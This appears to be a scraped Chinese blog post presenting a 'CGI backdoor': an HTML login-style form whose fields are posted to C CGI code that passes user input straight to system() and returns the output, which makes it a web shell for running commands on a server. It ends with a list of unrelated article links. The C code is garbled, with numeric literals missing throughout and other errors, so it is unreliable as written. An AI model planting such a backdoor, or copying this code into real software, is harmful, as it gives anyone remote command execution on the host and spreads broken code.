1.html代码

<form id = "form" name="form" method="post" action="../cgi-bin/Hello.cgi">

<p></p>

<input type="text" name="cmd1" id="user" value= "用户名"/>

<p></p>

<input type="text" name="cmd2" id="pass" value= "密码"/>

<p></p>

<input type="submit" name="go" id= "Hello" value="进入">

</form>

2.C代码

#define  _CRT_SECURE_NO_WARNINGS

#include<stdio.h>

#include<stdlib.h>

#include<time.h>

//..上一层目录

//"cmd1=123&cmd2=456&go=%BD%F8%C8%EB"

void main123()

{

    printf("Content-type:text/html\n\n");//换行

    char szpost[] = {  };

    gets(szpost);

    printf("%s", szpost);

    char*p1 = strchr(szpost, '&');

    if (*p1 != NULL)

    {

        *p1 = '\0';

    }

    printf("<br>%s", szpost + );

    char *p2 = strchr(p1 + , '&');

    if (*p2!=NULL)

    {

        *p2 = '\0';

    }

    printf("<br>%s", p1+);

    //system(szpost + 5);

    char cmd[] = {  };

    time_t ts;

    unsigned data = time(&ts);

    srand(&ts);

    int num = rand();

    sprintf(cmd, "%s %s >%d.txt", szpost + , p1 + , num);

    char filename[] = {  };

    sprintf(filename, "%d.txt", num);

    system(cmd);

    FILE *pf = fopen(filename, "r");

    while (!feof(pf))

    {

        char ch = fgetc(pf);

        if (ch == '\n')

        {

            printf("<br>");

        }

        else

        {

            putchar(ch);

        }

    }

    fclose(pf);

}

void main3()

{

    printf("Content-type:text/html\n\n");//换行

    char szpost[] = {  };

    gets(szpost);

    printf("%s", szpost);

    char*p1 = strchr(szpost, '&');

    if (*p1!=NULL)

    {

        *p1 = '\0';

    }

    printf("<br>%s", szpost + );

    //system(szpost + 5);

    char cmd[] = {  };

    time_t ts;

    unsigned data = time(&ts);

    srand(&ts);

    int num = rand();

    sprintf(cmd, "%s >%d.txt", szpost + ,num);

    char filename[] = {  };

    sprintf(filename,"%d.txt", num);

    system(cmd);

    FILE *pf = fopen(filename, "r");

    while (!feof(pf))

    {

        char ch = fgetc(pf);

        if (ch=='\n')

        {

            printf("<br>");

        }

        else

        {

            putchar(ch);

        }

    }

    fclose(pf);

}

void main2()

{

    printf("Content-type:text/html\n\n");//换行

    char szpost[] = {  };

    gets(szpost);

    printf("%s", szpost);

}

//重定向输出

//输入

void main()

{

    printf("Content-type:text/html\n\n");//换行

    for (int i = ; i < ; i++)

    {

        //printf("锄禾日当午\n");

        printf("锄禾日当午<br>");

    }

}

服务器开发之CGI后门的更多相关文章

  1. 高性能服务器开发之C++定时器

    高性能服务器开发之C++定时器 来源: https://www.cnblogs.com/junye/p/5836552.html 写这篇文章前搜了下网上类似的文章,有很多,所以笔者的这篇文章就不对定时 ...

  2. JSON的服务器开发之路

    JSON的服务器开发之路 不知道需要哪儿些包... /dcywpt/WebRoot/WEB-INF/lib/commons-collections-3.2.jar /dcywpt/WebRoot/WE ...

  3. C语言进行站点开发之cgi

     安装Apach 配置ApacheRuntime 以下的过程中一直点击next 配置CGI,放开配置:AddHandler cgi-script .cgi watermark/2/text/aHR ...

  4. JavaEE开发之SpringMVC中的静态资源映射及服务器推送技术

    在上篇博客中,我们聊了<JavaEE开发之SpringMVC中的自定义拦截器及异常处理>.本篇博客我们继续的来聊SpringMVC的东西,下方我们将会聊到js.css这些静态文件的加载配置 ...

  5. Android安全开发之WebView中的地雷

    Android安全开发之WebView中的地雷 0X01 About WebView 在Android开发中,经常会使用WebView来实现WEB页面的展示,在Activiry中启动自己的浏览器,或者 ...

  6. 微信公众号开发之VS远程调试

    目录 (一)微信公众号开发之VS远程调试 (二)微信公众号开发之基础梳理 (三)微信公众号开发之自动消息回复和自定义菜单 前言 微信公众平台消息接口的工作原理大概可以这样理解:从用户端到公众号端一个流 ...

  7. Android安全开发之ZIP文件目录遍历

    1.ZIP文件目录遍历简介 因为ZIP压缩包文件中允许存在“../”的字符串,攻击者可以利用多个“../”在解压时改变ZIP包中某个文件的存放位置,覆盖掉应用原有的文件.如果被覆盖掉的文件是动态链接s ...

  8. Cocos2d-x 3.x游戏开发之旅

    Cocos2d-x 3.x游戏开发之旅 钟迪龙 著   ISBN 978-7-121-24276-2 2014年10月出版 定价:79.00元 516页 16开 内容提要 <Cocos2d-x ...

  9. iOS开发之Socket通信实战--Request请求数据包编码模块

    实际上在iOS很多应用开发中,大部分用的网络通信都是http/https协议,除非有特殊的需求会用到Socket网络协议进行网络数 据传输,这时候在iOS客户端就需要很好的第三方CocoaAsyncS ...

随机推荐

  1. 洛谷 P1471 方差

    洛谷 P1471 方差 题目背景 滚粗了的HansBug在收拾旧数学书,然而他发现了什么奇妙的东西. 题目描述 蒟蒻HansBug在一本数学书里面发现了一个神奇的数列,包含N个实数.他想算算这个数列的 ...

  2. hackerrank Ticket

    传送门 题意:n个人排队买票,要把他们拆成k条队到k个窗口买,可以有队伍为空,每条队的顺序保持拆之前的顺序.如果某人和他前一个人买的票相同,就可以打八折,求最小花费. 题解:拆成k条队意味着只有[n- ...

  3. JAVA虚拟机之对象探秘

    上一章主要写到了JVM中运行时数据区域各个部分的功能及其作用.上一章说到了对象是分配在堆上面的,所以接下来我们写到对象在堆内存中是如何创建.如何布局.如何访问.1. 对象的创建 在java程序中对象的 ...

  4. 从parcel.js打包出错,到拥抱nvm

    去年年底发布的parcel.js在年底可谓是火了一把,短短一个多月的时间在GitHub热门排行榜上名列前茅.因其几乎零配置的易用性,相比Webpack的复杂配置收获了大量关注及好评,甚至有人预言未来大 ...

  5. SpringMVC框架学习笔记(3)——controller配置汇总

    1.通过URL对应bean <!-- 配置handlerMapper 映射器 --> <bean class="org.springframework.web.servle ...

  6. zookeeper基本讲解及基本命令和配置 (转)

    一.ZooKeeper概述 ZooKeeper是一种为分布式应用所设计的高可用.高性能且一致的开源协调服务,是Google的Chubby一个开源实现,是Hadoop和Hbase的重要组件,它提供了一项 ...

  7. jvm内存模型-回收算法-和内存分配以及jdk、jre、jvm是什么关系(阿里,美团,京东面试题)

    1.什么是jvm?(1)jvm是一种用于计算设备的规范,它是一个虚构出来的机器,是通过在实际的计算机上仿真模拟各种功能实现的.(2)jvm包含一套字节码指令集,一组寄存器,一个栈,一个垃圾回收堆和一个 ...

  8. 获取Object对象的length

    所有JS程序猿(甚至不止JS)都知道,数组(Array)是有length的,通过length属性,可以很方便的获取数组的长度.可以说,只要使用到了数组,就必会使用到其length属性. 而Object ...

  9. [最直白版]一步一步教你用VMware Workstation12安装Ubuntu 16.04和VMware Tools的教程

    [最直白版]Win10下一步一步教你用 VMware Workstation12安装Ubuntu 16.04和VMware Tools的教程 安装过程中使用的软件(要保证电脑里面有下列三个东西): 1 ...

  10. springboot:快速构建一个springboot项目

    前言: springboot作为springcloud的基础,springboot的热度一直很高,所以就有了这个springboot系列,花些时间来了解和学习为自己做技术储备,以备不时之需[手动滑稽] ...